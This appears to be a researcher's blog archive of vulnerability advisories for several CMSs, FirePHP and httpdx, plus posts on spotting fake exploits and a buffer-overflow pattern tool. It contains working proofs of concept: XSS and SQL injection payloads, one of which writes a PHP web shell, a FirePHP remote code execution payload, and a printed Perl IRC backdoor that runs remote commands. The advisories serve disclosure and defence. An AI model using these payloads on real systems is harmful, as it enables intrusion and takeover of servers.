Results tagged “vulnerability” from Just Another Hacker

20130417 - : FirePHP firefox plugin remote code execution
JAHx132 -

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: ]

--- Vulnerability description ---
The extension does not sufficiently validate cell names in array data received from the remote 
host resulting in arbitrary script execution in the chrome privileged context if a user
inspects the malicious data in firephp.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP -
Affected versions: All versions prior to 0.7.2

--- Proof of Concept ---
 * FirePHP Firefox plugin Remote code execution PoC                            *
 * Written by Wireghoul -   *
 * Greetz to @bcoles urbanadventurer @malerisch              *

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\";1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\";1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= ',[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
  <title>FirePHP Firefox plugin RCE PoC</title>

--- Solution ---
Upgrade to version 0.7.2

--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledge vulnerability
09-Apr-2013 - Vendor notified through email

20130212 - : httpdx multiple access control bypass
JAHx131 -

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: ]

--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            realm="Stuff for admin only!"
As long as your request does not match these static strings, but the path resolves to the same
files you can access the content.

Additionally, as the server doesn't support traditional binding of virtualhosts to network
interfaces you must configure virtualhost specific behaviour through similar string matching
    if<%HTTP_HOST% != "" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the
localhost virtualhost remotely, just set your Host: header to localhost.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx -
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.

--- Solution ---
The software appears to be abandoned and the same versions suffers from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

20121017 - : Symphony cms - Multiple vulnerabilities
JAHx122 -

Symphony is an XSLT-powered open source content management system.
[ Taken from: ]

--- Vulnerability description ---
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in
severity from low to high and can result in complete compromise by an
unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony -
Affected versions: 2.3 (and possibly earlier)

--- Local patch disclosure ---
Direct requests to library files will disclose the full local file path if php is configured
to display errors due to the reliance on the library path being declared in a constant
of global scope outside of the library script.


--- User enumeration ---
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table an attacker can login to their account by brute forcing a key of [0-9A-F]^8 length.

The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/ for the user "admin" with password "admin".

--- Cross site scripting ---
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

Submit form with email address:

The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.


The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded resulting in persistent cross site scripting.


--- Blind sql injection ---
The username field in the authors detail page is not sufficiently filtered when checking
is the username already exists in the system. Resulting in blind sql injection.

Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email

20120831 - : PHP Shell Detector - Cross site scripting
JAHx121 -

PHP Shell Detector is a php script that helps you find and identify php shells. It also has
a "web shells" signature database that helps to identify "web shell" up to 99%. By using the
latest javascript and css technologies, php shell detector has a light weight and friendly
interface. The main features is that if you're not sure about a suspicious file, you may send
it to the team.  After submitting your file, it will be inspected and if
there are any threats, it will be inserted into a "php shell detector" web shells signature
database and the next time this file will be recognized positively.
[ Taken from: ]

--- Vulnerability description ---
The shell detector script does not sufficiently sanitise filenames of detected shells or
suspicious files, resulting in cross site scripting.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Full
CVE: None
Vendor: Emposha -
Affected versions: 1.51 - earlier versions may also be affected.

--- Proof of Concept ---
Create a payload out of a file detected by the PSD script, ie:
root@localhost:~# mv htaccess.php  \<img\ src\=x\ onerror\=alert\(1\)\>.txt
Then scan the directory containing the renamed file.

--- Solution ---
There is no solution at this time.

--- Disclosure time line ---
31-Aug-2012 - Public disclosure

Quick and dirty exploit vetting

Got some exploit code that you didn't write? You had better check it first. Especially as I've seen a few people link to fake exploits lately. One example is the supposed winnuker from Which sports the following payload:

Never run an exploit if you didn't write it or don't understand the shellcode. I cannot stress that enough. Anyway, the exploit code has a bad smell to it, so I do a lazy check of the shell code:
~$ echo -e "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69";
$chan="#darknet";$nick="moron";$server="";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
If you work with hex or shellcode regularly you might have already worked out that the shellcode was in fact text (the large number of \x20 is a pretty dead giveaway). As you can see a quick check of the shellcode reveals that this is in fact a fake exploit that offers a remote shell to the entire efnet #darknet channel. If the shellcode is binary then you'll need to do some more analysis, but for most fake exploits the above technique usually reveals them.
20110713 - : Chyrp - Multiple vulnerabilties
JAHx113 -

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern
[ Taken from: ]

--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
The javascript.php xss can also be invoked through rewrite rules using the following querystring -

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a php gotcha when using the return value of strpos in an if statement as matches on position 0
will result in a false negative.

--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

Appended ;*.php in script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
upload_complete_handler : uploadComplete
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

20110525 - : Cross site scripting in Movable Type
JAHx112 -

Movable Type is a professional publishing platform
[ Taken from: ]

--- Vulnerability description ---
The 'static' parameter to the comment script is not sufficiently sanitised which allows an attacker
to break out of the meta redirect url in the response, resulting in a cross site scripting attack.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Responsible
CVE: Unassigned
Movable Type BugID: #105441
Vendor: Six Apart Ltd -
Affected versions:
* Movable Type Open Source 4.x
* Movable Type Open Source 5.x
* Movable Type 4.x ( with Professional Pack, Community Pack )
* Movable Type 5.x ( with Professional Pack, Community Pack )
* Movable Type Enterprise 4.x

--- Proof of Concept ---"><script>alert(document.cookie)</script>&logout=1&entry_id=

--- Solution ---
Upgrade to the latest versions of Movable Type 4 or Movable Type 5.
* Movable Type Open Source 4.36
* Movable Type Open Source 5.05
* Movable Type Open Source 5.1
* Movable Type 4.36( with Professional Pack, Community Pack)
* Movable Type 5.05( with Professional Pack, Community Pack)
* Movable Type 5.1( with Professional Pack, Community Pack)
* Movable Type Enterprise 4.36
* Movable Type Advanced 5.1

--- Disclosure time line ---
25-May-2011 - Advisory released
24-May-2011 - New version released
18-May-2011 - Patch produced
11-Jan-2011 - Vendor acknowledge vulnerability
08-Jan-2011 - Vendor notified through email

20110424 - : Symphony-cms blind sql injection
JAHx111 -

Symphony is a web-based content management system (CMS) that enables users to create and
manage websites and web applications of all shapes and sizes?from the simplest of blogs to
bustling news sites and feature-packed social networks.
[ Taken from: ]

--- Vulnerability description ---
The symphony cms login page does not sufficiently filter user supplied variables used in a
SQL statement, resulting in a blind sql injection vulnerability. The vulnerable code is located at:
content.login.php-270-$sql = "SELECT t1.`id`, t1.`email`, t1.`first_name`
content.login.php-271- FROM `tbl_authors` as t1, `tbl_forgotpass` as t2
content.login.php:272: WHERE t2.`token` = '".$_REQUEST['token']."' AND t1.`id` = t2.`author_id`
content.login.php-273- LIMIT 1";
content.login.php-275-$author = Symphony::Database()->fetchRow(0, $sql);

Discovered by: Eldar "Wireghoul" Marcussen
Type: Blind sql injection
Severity: Moderate
Release: Full
CVE: None
Vendor: Symphony-cms
Affected versions: 2.1.2 and possibly older versions

--- Proof of Concept ---
The following example will reset the password of the admin user which was created during installation
(id 1) and send an email to '' with the username and new password.'+union+select+id,'',username+from+tbl_authors+where+id+=1+--+

We are aided by the following code:
lib/toolkit/class.mysql.php:251:if($this->_connection['tbl_prefix'] != 'tbl_'){
lib/toolkit/class.mysql.php:252: $query = preg_replace('/tbl_(\S+?)([\s\.,]|$)/', $this->_connection['tbl_prefix'].'\\1\\2', $query);
Which turn our tbl_authors into the appropriate prefixed table name. This essentially negates the use
of custom prefix for tables.

--- Solution ---
Upgrade to version 2.2

--- Disclosure time line ---
24-Apr-2011 - Public disclosure
20101028 - : Multiple vulnerabilities in Feindura CMS
JAHx104 -

Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: ]

--- Vulnerability description ---
Feindura CMS sufferes from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned direclty from user input and later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

Buffer overflow pattern tool

I can't help fee like an arrogant bastard writing this post. It is not my intention to discredit the work of others. I have tremendous respect for the skill of people who do reverse engineering and exploit development.

I have been working on (learning) exploit writing lately and although I had heard about it before I hadn't actually used the pattern generator approach. Being a perl man I decided I wanted to grab a perl based generator so I could modify it to suit my own needs. A quick google later I found Wasim Halani's perl implementation at After a quick play with that I decided that I should just write my own.
My first run produced a similar looking string, but my 1024th character was off by one. I decided to compare the two strings and founbd the difference at byte 781. Washal's implementation appends the uppercase character before incrementing the uppercase character, ie: "7Az8Az9ABa0" instead of "7Az8Az9Ba0". Comparing it to metasploit's tools/pattern_create.rb mine was spot on. I decided to take it all the way to the end for comparison so I generated a 20280 character string from both tools and compared them. This time there was a difference at byte 20278, metasploit produced "Zz8Aa0" as the last six characters compared to my "Zz8Zz9". I consider my behaviour to be correct and reported the bug.

Furthermore, once you go past 20280 characters the pattern starts repeating. My tool relies on the perl string incrementer and that changes the pattern from three to four characters in my tool. I tend to lean to my behaviour as correct, especially when dealing with 8 byte addresses, but I am completely biased. So without any further ado, here is my implementation of the buffer overflow pattern generator.

# Buffer Overflow Pattern generator v 1.0
# Written by Wireghoul -
use strict;
use warnings;

sub generate {
    my $len=shift;
    my $pattern='Aa0';
    my $out = '';
    while (length($out) < $len) {
    return substr($out,0,$len);

sub search {
    my $string = shift;
    # If we get a hex string, decode and reverse it
    if ($string =~ /0x/) {
        $string =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
        $string =~ s/0x//;
        $string = reverse $string;
    my $pat = 'Aa0';
    my $out = '';
    while ($out !~ m/$string/) {
    return index($out, $string);

if (!$ARGV[0]) {
   print "Buffer overflow pattern generator by Wireghoul\n$0 <size> creates pattern of size characters\n$0 string finds offset of string in pattern\n";
   exit 0 ;
if ($ARGV[0] =~ m/^\d+$/) {
    print generate($ARGV[0])."\n";
} else {
    print search($ARGV[0])."\n";
I'll finish with some examples of usage:
~/challenge$ ./vuln `bop 1025`
Segmentation fault
~/challenge$  bop 0x42306942
~/challenge$ bop Bi0B
1020+length("Bi0B) = 1024 in case that wasn't clear. I hope you'll enjoy the tool.

Custom graudit signatures

Writing your own graudit signatures is relatively easy. Mastering regular expressions can be helpful, but in their simplest form a list of words will do. I have tried to document some of the common pitfalls that might creep up on you in my Ruxmon presentation, but I know how "useful" a single slide can be. I am catching up on graudit documentation and signatures is just around the corner. Until then, I thought I would share with you some of the databases I use when looking for low hanging fruit and want to reduce the information overload (noise) that you normally get from the php ruleset. Signatures after the break to avoid spamming rss readers.

Tool review: Bugle

Bugle is a neat tool which uses google and regular expressions to detect security defects in code. It makes it super quick to find vulnerable code.

The downside is that the code is often old and the vulnerability has been found, disclosed and fixed. And checking all those hits take time. Still it is well worth a spin.

Bugle's use of regular expressions to locate code defects was what initially prompted me to organize my messy scripts into the open source script graudit

Security roulette

I had some spare time, so I created a little game. I've called it security roulette. The object is to find as many web application security flaws as you can in a given number of websites in a limited timeframe.The number of websites is determined by google and the time limit is self imposed or agreed to if you are challenging someone.

I wrote a quick mashup to help you play. The scorecard could probably use some tweaking. My suggested house rule is "no browser plugins or third party applications allowed".

Security roulette

Security roulette is a simple game I have made up, the instructions are provided once you start. Use the form below to get started.

20100625 - : Multiple vulnerabilities in maiacms
JAHx103 -

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.

--- Authentication bypass ---
Most of the admin pages has a check and redirect to login snippet to validate login:
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

curl ''

--- Session control ---
The script update_session.php relies on the the aforementioned access control weakness and allows the session data to be changed or created directly through a HTTP POST operation.
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;

--- Solution ---
Wait for the next or non alpha release

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

20100205 - : HuskiCMS local file inclusion
JAHx102 -

huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: ]

--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive -
Affected versions:

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";

    // Quicksite Core Includes
    include_once "Quicksite/Core/";
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    // Create the Page
    echo $page->Result;

--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email
20100205 - : Huski retail mulitple SQL injection vulnerabilities
JAHx101 -

Huski Retail
Ascet Interactive offers you a very simple and cost effective method of selling goods and services online. Ascet Interactive provides you with a catalogue targeted at your customers, whether they are retail customers or your dealer network. Imagine being able to save on printing, faxing and administration costs by making your whole product range available at anytime via the Web.
[ Taken from: ]

--- Vulnerability description ---
The categoryID and productID parameters used in several pages are not sufficiently sanitised, leading to SQL injection.

Discovered by: Eldar "Wireghoul" Marcussen
Type: SQL Injection
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive -
Affected versions:

--- Exploit URI ---




--- Solution ---
Contact the vendor for a fix

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email

Bank of Queensland XSS



